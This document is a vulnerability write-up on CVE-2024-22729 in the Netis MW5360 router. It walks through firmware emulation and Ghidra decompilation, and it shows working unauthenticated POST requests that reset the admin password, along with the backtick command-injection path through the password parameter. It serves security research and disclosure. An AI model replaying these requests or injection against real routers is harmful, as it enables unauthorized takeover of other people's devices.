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NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.
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Attacker ValueVery High
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Netis Systems Co., Ltd is a global leading provider of networking products and solutions in the data communication industry. It has three worldwide independent brands “netis”, “netcore” and “stonet” .Product lines of Netis company includes Wireless routers, Access point wireless adapters, Dump switches, POE switches, Industrial switches, etc.
A critical security vulnerability has been identified in the Netis router MW5360 by security researcher adhikara13
. This vulnerability results in a Blind Command Injection in the “password” parameter, leading to unauthorized access.
shared details in a POC on Github how to exploit this vulnerability which can be found here.
A more detailed analysis on vulnerability is not available so I did some reverse engineering on the firmware to understand the details of this vulnerability. So I download the latest firmware MW5360-
from here which is a very recent release from April 2024 that is still vulnerable :–(.
I emulated the firmware using FirmAE
and used burpsuite
to catch the requests to understand what was going on.
On the initial startup of the router, it will show you a welcome message and a setup screen to configure the router administration password and wifi settings including the wifi password which is the same as the administration password.
Capturing this request with burpsuite
already shows the first design flaw, because this POST request can be executed multiple times without any authentication where the wifi password and administration password can be changed by manipulating the password
and wpaPsk
POST Request
POST /cgi-bin/skk_set.cgi HTTP/1.1 Host: Content-Length: 201 Accept: text/plain, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: Referer: Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close wlanMode=0&wl_idx=0&ssid2g=bmV0aXMtMDAwMDAw&encrypt=4&wpaPsk=SWwwdmVoYWNraW5n&wpaPskType=2&wpaPskFormat=0&password=SWwwdmVoYWNraW5n&autoUpdate=0&firstSetup=1&quick_set=ap&app=wan_set_shortcut&wl_link=0
Successful Response
HTTP/1.1 200 OK Date: Sun, 02 Jun 2024 12:20:24 GMT Server: Boa/0.94.14rc21 Connection: close ["SUCCESS"]
You can even modify the request to only manipulate the router administration password by stripping the wifi parameters from the request.
POST /cgi-bin/skk_set.cgi HTTP/1.1 Host: Content-Length: 59 Accept: text/plain, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: Referer: Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close password=SWwwdmVoYWNraW5n&quick_set=ap&app=wan_set_shortcut
So far, so good, but besides this authentication bypass, there is also a blind command injection vulnerability in the password parameter according to CVE description.
To understand this a bit better, we need to dig into the firmware code.
If you login in into the emulated router software, you will find the main web binary netis.cgi
in /bin
. This is a compiled MIPS ELF binary so we need a tool like ghidra
to decompile and understand the code.
Loading and analyzing netis.cgi
in ghidra
shows that the main program is a wrapper that runs the specific cgi
request calls like our skk_set.cgi
that we can see with burpsuite
when interacting with the Netis web interface.
undefined4 main(undefined4 param_1,char **param_2) { bool bVar1; size_t sVar2; int iVar3; char *pcVar4; char *local_188; int local_184; int local_17c; void *local_160; char acStack_15c [256]; char cStack_5c; char acStack_5b [63]; int local_1c; char *local_18 [4]; local_160 = (void *)0x0; memset(&cStack_5c,0,0x40); local_1c = 0; sVar2 = strlen(*param_2); while (local_1c < (int)sVar2) { memset(&cStack_5c,0,0x40); iVar3 = local_1c; FUN_0040670c((int)*param_2,'/',&local_1c); strncpy(&cStack_5c,*param_2 + iVar3,local_1c - iVar3); do { local_1c = local_1c + 1; } while ((*param_2)[local_1c] == '/'); } local_188 = &cStack_5c; bVar1 = false; local_18[0] = "skk_set.cgi"; local_18[1] = "upload_config.cgi"; local_18[2] = "upload_fw.cgi"; local_18[3] = (char *)0x0; local_17c = 0; do { if (local_18[local_17c] == (char *)0x0) { LAB_00405408: if (bVar1) { iVar3 = open("/tmp/lock_all.lock",0x702,0x1b4); if (iVar3 < 0) { local_184 = FUN_004050fc(); if (local_184 < 0) { local_184 = 0; } FUN_00405060(local_184); if (2 < local_184) { system("rm -rf /tmp/lock_all.lock"); FUN_00405060(0); } printf("[\"LOCK\"]"); return 0; } close(iVar3); } apmib_init(); FUN_00422c38(&local_160,param_2[1]); DAT_00440d40 = FUN_00405190(); if (local_188 == (char *)0x0) { iVar3 = access("/tmp/lock_all.lock",0); if (iVar3 == 0) { system("rm -rf /tmp/lock_all.lock"); } FUN_004214cc(&local_160); printf("[\"%d\"]",999); } else { pcVar4 = strstr(local_188,".cgi"); if (pcVar4 != (char *)0x0) { pcVar4 = strchr(local_188,0x2f); if (pcVar4 != (char *)0x0) { local_188 = acStack_5b; } FUN_00405764(local_188,&local_160,acStack_15c); } fflush(stdout); FUN_004214cc(&local_160); iVar3 = access("/tmp/lock_all.lock",0); if (iVar3 == 0) { system("rm -rf /tmp/lock_all.lock"); } FUN_00405060(0); } return 0; } iVar3 = strcmp(local_188,local_18[local_17c]); if (iVar3 == 0) { bVar1 = true; goto LAB_00405408; } local_17c = local_17c + 1; } while( true ); }
Let’s check the code for the password
string and see where is it used. You can do this by using the search function in ghidra
This creates quite some hits, but the most interesting hit is the ex_password
variable which seems to be linked to a script /bin/script/
ex_password XREF[2]: Entry Point(*), FUN_0041301c:00413180(*) 0043be44 2f 62 69 ds "/bin/script/" 6e 2f 73 63 72 69
Checking out function FUN_0041301c:00413180(*)
shows ex_password
a.k.a. /bin/script/password,sh
is being called by the function FUN_00402e00("%s > /dev/console",ex_password,pcVar1,param_4);
undefined4 FUN_0041301c(undefined4 *param_1,undefined4 param_2,char *param_3,undefined4 param_4) { char *pcVar1; byte *pbVar2; byte abStack_8c [132]; pcVar1 = FUN_00405644(param_1,"usb3gEnabled"); if (pcVar1 != (char *)0x0) { FUN_00405644(param_1,"usb3gPinCode"); param_3 = FUN_00405644(param_1,"usb3gApn"); param_4 = 0; FUN_00412fe4(); FUN_00402e00("%s > /dev/console",ex_usbcontrol,param_3,param_4); } pbVar2 = (byte *)FUN_00405644(param_1,"ssid2g"); if (pbVar2 != (byte *)0x0) { FUN_004030f4(abStack_8c,pbVar2); strcpy((char *)(pMib + 0x42c1),(char *)abStack_8c); } FUN_00402e00("echo 0 > %s","/proc/http_redirect/enable",param_3,param_4); memset(abStack_8c,0,0x80); apmib_get(0x159,abStack_8c); pcVar1 = "/proc/rtl_dnstrap/domain_name"; FUN_00402e00("echo \'%s\' > %s",abStack_8c,"/proc/rtl_dnstrap/domain_name",param_4); FUN_00402e00("%s > /dev/console",ex_password,pcVar1,param_4); FUN_00402e00("%s > /dev/console",param_2,pcVar1,param_4); return 0; }
Interesting, but lets check if this code segment really gets executed if we run the POST request again. A quick trick is to monitor the process list on the router and grep the relevant processes during the execution of the POST request.
# while true; do ps|grep -e -e rtl -e http_redirect|grep -v grep;done 3518 root 1132 R /bin/sh -c echo 0 > /proc/http_redirect/enable 3520 root 1132 R /bin/sh -c echo '' > /proc/rtl_dnstrap/domain 3531 root 1140 S /bin/sh -c /bin/script/ > /dev/console 3538 root 324 R /bin/script/ 3531 root 1140 S /bin/sh -c /bin/script/ > /dev/console 3538 root 1656 S /bin/script/
And indeed /bin/script/
gets executed as well as some other commands listed in the code.
So let’s now focus on the /bin/scripts/
Checking out this shell script, it turns out to be a compiled MIPS ELF binary instead of a text readable unix shell script.
Let’s use ghidra
again to decompile this binary and use the search function to look for the password
Again quite some hits, but then I stumble over a very interesting piece of code.
s_Changed_Username_and_Password_.._0041dc80 XREF[1]: FUN_00409590:0040969c(*) 0041dc80 43 68 61 ds "Changed Username and Password ...........\n" 6e 67 65 64 20 55
This is most likely the code section that sets the router administration password.
Checking out the function FUN_00409590
is revealing two major issues.
void FUN_00409590(void) { undefined auStack_488 [64]; undefined auStack_448 [64]; undefined auStack_408 [1024]; memset(auStack_408,0,0x400); memset(auStack_488,0,0x40); memset(auStack_448,0,0x40); apmib_get(0x15d,auStack_488); apmib_get(0x15e,auStack_448); RunSystemCmd("echo \"root::0:0:root:/:/bin/sh\" > /var/passwd"); RunSystemCmd("echo \"nobody:x:0:0:nobody:/:/dev/null\" >> /var/passwd"); RunSystemCmd("echo root:%s | chpasswd -m",auStack_448); RunSystemCmd("echo \"root:x:0:root\" > /var/group"); RunSystemCmd("echo \"nobody:x:0:nobody\" >> /var/group"); RunSystemCmd("chmod 755 /var/passwd"); RunSystemCmd("chmod 755 /var/group"); fwrite("Changed Username and Password ...........\n",1,0x2a,stderr); return; }
The first issue is that the router administration password is directly linked to the root password of router itself.
Oeps! That is not really best practice and attackers love these things.
The second issue is the blind command injection where the vulnerable code RunSystemCmd("echo root:%s | chpasswd -m",auStack_448);
allows an attacker to manipulate password argument represented by auStack_448
and inject and execute code using the unix backtics.
This explains why the password parameter is indeed vulnerable of blind command injection.
The RunSystemCmd
function is just a piece a code which is defined in the library
and executes a unix command line using the system()
void RunSystemCmd(char *param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4) { undefined4 local_res4; undefined4 local_res8; undefined4 local_resc; char acStack_118 [256]; undefined4 *local_18; local_res4 = param_2; local_res8 = param_3; local_resc = param_4; memset(acStack_118,0,0x100); local_18 = &local_res4; vsprintf(acStack_118,param_1,local_18); system(acStack_118); return; }
I have created an exploit that is published as official module Netis MW5360 unauthenticated RCE [CVE-2024-22729] in Metasploit.
Unfortunately there is no mitigation, because the latest firmware from April 2024 is still vulnerable. So be on the alert when suddenly your router administration password changes unexpectedly and you can not login into your router anymore.
Netis MW5360 unauthenticated RCE [CVE-2024-22729]
Firmware MW5360-
Credits go to the security researcher below who discovered this vulnerability.
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